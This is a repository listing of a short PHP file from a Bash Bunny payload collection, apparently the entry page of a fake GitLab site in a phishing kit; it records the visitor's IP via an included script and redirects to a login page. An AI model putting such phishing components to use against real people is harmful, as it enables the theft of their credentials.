Files
bashbunny-payloads/payloads/library/phishing/Triggered_Bunny/sites/gitlab/index.php
2022-12-25 23:02:06 +05:30

6 lines
64 B
PHP

<?php
include 'ip.php';
header('Location: login.html');
exit
?>